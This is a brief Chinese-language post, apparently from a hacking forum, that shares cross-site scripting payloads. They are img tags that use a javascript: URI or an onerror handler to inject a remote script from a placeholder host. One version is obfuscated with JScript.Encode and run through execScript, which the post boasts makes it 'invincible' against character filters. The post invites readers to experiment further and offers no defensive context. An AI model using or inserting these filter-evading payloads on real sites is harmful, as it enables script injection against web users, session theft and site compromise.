<img src="javascript:try{var s=document.createElement(\’script\’);s.src=\’http://XSS/XSS.js\’;document.body.appendChild(s);}catch(e){}"></img>
字符过滤怎么办?用Encode加密后就无敌了~
未加密前:
<img src=\’#\’ XSS="try{var s=document.createElement(\’script\’);s.src=\’http://XSS/XSS.js\’;document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),\’Jscript.Encode\’);" >
加密后:
<img src=\’#\’ XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es UYcm.nmY As s xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs OR(W[Xcl22xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " onerror="execScript(decodeURI(this.XSS),\’Jscript.Encode\’);" >
嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一次Encode加密后的代码